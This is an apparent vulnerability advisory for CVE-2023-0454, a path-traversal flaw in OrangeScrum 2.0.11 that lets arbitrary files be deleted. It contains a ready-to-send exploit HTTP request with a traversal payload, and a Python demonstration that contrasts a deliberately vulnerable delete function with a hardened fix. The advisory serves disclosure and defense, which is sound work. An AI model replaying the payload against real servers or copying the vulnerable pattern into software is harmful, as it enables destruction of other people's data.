OrangeScrum 2.0.11 - Arbitrary File Delete via file_name
| Field | Value |
| --- | --- |
| Name | OrangeScrum 2.0.11 - Arbitrary File Delete via file_name |
| Kind | Lack of data validation - Path Traversal |
| Rule | 063. Lack of data validation - Path Traversal |
| CVSSv3 Base Score | 8.1 |
OrangeScrum version 2.0.11 allows an authenticated external attacker to delete arbitrary local files from the server. This is possible because the application uses the unsanitized, attacker-controlled `file_name` parameter of the `/projects/delete_file` endpoint to construct an internal path: `../` segments in the value are not rejected, so the resulting path can point at any file the web server process is allowed to unlink.
To exploit this vulnerability, we only need to send the following malicious request to the server (the session cookies below belong to a low-privileged test account):

```http
POST /projects/delete_file HTTP/1.1
Host: retr02332bughunter.orangescrum.com
Cookie: USER_UNIQ=1515f12e8e8fc20b7a103011dee82b89; USERTYP=2; USERTZ=49; USERSUB_TYPE=0;
User-Agent: Retr02332
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 96
Connection: close

file_name=../../../../../../../../../../../../../var/www/html/orangescrum/app/webroot/hacked.txt
```
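The root cause and its fix, as an added example that is not OrangeScrum's code (OrangeScrum is a PHP application; this is a Python reconstruction of the same pattern, and the directory layout, file names and the `vulnerable_delete`/`safe_delete` functions are constructed for the demonstration). The vulnerable function joins the request parameter onto the attachment directory unchecked; the hardened one rejects multi-component names and, as defense in depth, canonicalizes the path with `realpath` and verifies it still lies inside the attachment directory, which also catches symlinks and the "excess `../`" form used in the advisory payload:

```python
import os
import tempfile


def vulnerable_delete(upload_dir: str, file_name: str) -> bool:
    """Pattern described in the advisory: the request parameter is joined
    onto the upload directory with no validation, so leading "../" segments
    walk out of upload_dir. Returns True if a file was removed."""
    path = os.path.join(upload_dir, file_name)
    if os.path.isfile(path):
        os.remove(path)
        return True
    return False


def resolve_inside(base_dir: str, file_name: str) -> str:
    """Return the canonical absolute path of file_name inside base_dir, or
    raise ValueError if the resolved path escapes base_dir. realpath
    collapses ".." segments (clamping at "/") and follows symlinks before
    the containment check, so the check is done on what the OS would open."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, file_name))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path traversal rejected: {file_name!r}")
    return target


def safe_delete(upload_dir: str, file_name: str) -> bool:
    """Hardened counterpart (hypothetical fix, not the vendor's patch)."""
    # A stored attachment name must be a single path component: reject any
    # separator or special name before touching the filesystem.
    if file_name in ("", ".", "..") or os.path.basename(file_name) != file_name:
        raise ValueError(f"invalid file name: {file_name!r}")
    path = resolve_inside(upload_dir, file_name)
    if os.path.isfile(path):
        os.remove(path)
        return True
    return False


def demo() -> dict:
    """Constructed scenario: a throwaway webroot with an attachment directory
    and a file one level above it standing in for the advisory's target."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        uploads = os.path.join(root, "app", "webroot", "files")
        os.makedirs(uploads)
        victim = os.path.join(root, "app", "webroot", "hacked.txt")

        def plant_victim():
            with open(victim, "w") as fh:
                fh.write("not an attachment\n")

        # 1. Vulnerable code: a single "../" escapes the attachment directory.
        plant_victim()
        results["vulnerable_deleted_outside"] = (
            vulnerable_delete(uploads, "../hacked.txt") and not os.path.exists(victim)
        )

        # 2. Hardened code refuses the same name and leaves the file alone.
        plant_victim()
        try:
            safe_delete(uploads, "../hacked.txt")
            results["safe_rejected_traversal"] = False
        except ValueError:
            results["safe_rejected_traversal"] = True
        results["victim_survives_safe_delete"] = os.path.exists(victim)

        # 3. The advisory's own payload: surplus "../" clamp at "/", so the
        #    canonical path is outside the base directory and is rejected.
        advisory_payload = ("../../../../../../../../../../../../../"
                            "var/www/html/orangescrum/app/webroot/hacked.txt")
        try:
            resolve_inside(uploads, advisory_payload)
            results["advisory_payload_rejected"] = False
        except ValueError:
            results["advisory_payload_rejected"] = True

        # 4. A legitimate single-component name is still deleted normally.
        legit = os.path.join(uploads, "report.pdf")
        open(legit, "w").close()
        results["safe_deleted_legit_file"] = (
            safe_delete(uploads, "report.pdf") and not os.path.exists(legit)
        )
    return results


if __name__ == "__main__":
    for check, outcome in demo().items():
        print(f"{check}: {outcome}")
```

The `basename` check alone would already stop the request shown above; the `realpath` containment check is kept because it also defends the case where the stored name is fine but the directory contains a symlink pointing outside the attachment tree, and because a later refactor that accepts sub-directories would otherwise silently reopen the hole.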
Evidence of exploitation
Our security policy
We have reserved the ID CVE-2023-0454 to refer to this issue from now on.
Version: OrangeScrum 2.0.11
Operating System: GNU/Linux
There is currently no patch available for this vulnerability.
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
Vendor page https://github.com/Orangescrum/orangescrum/
Vendor replied acknowledging the report.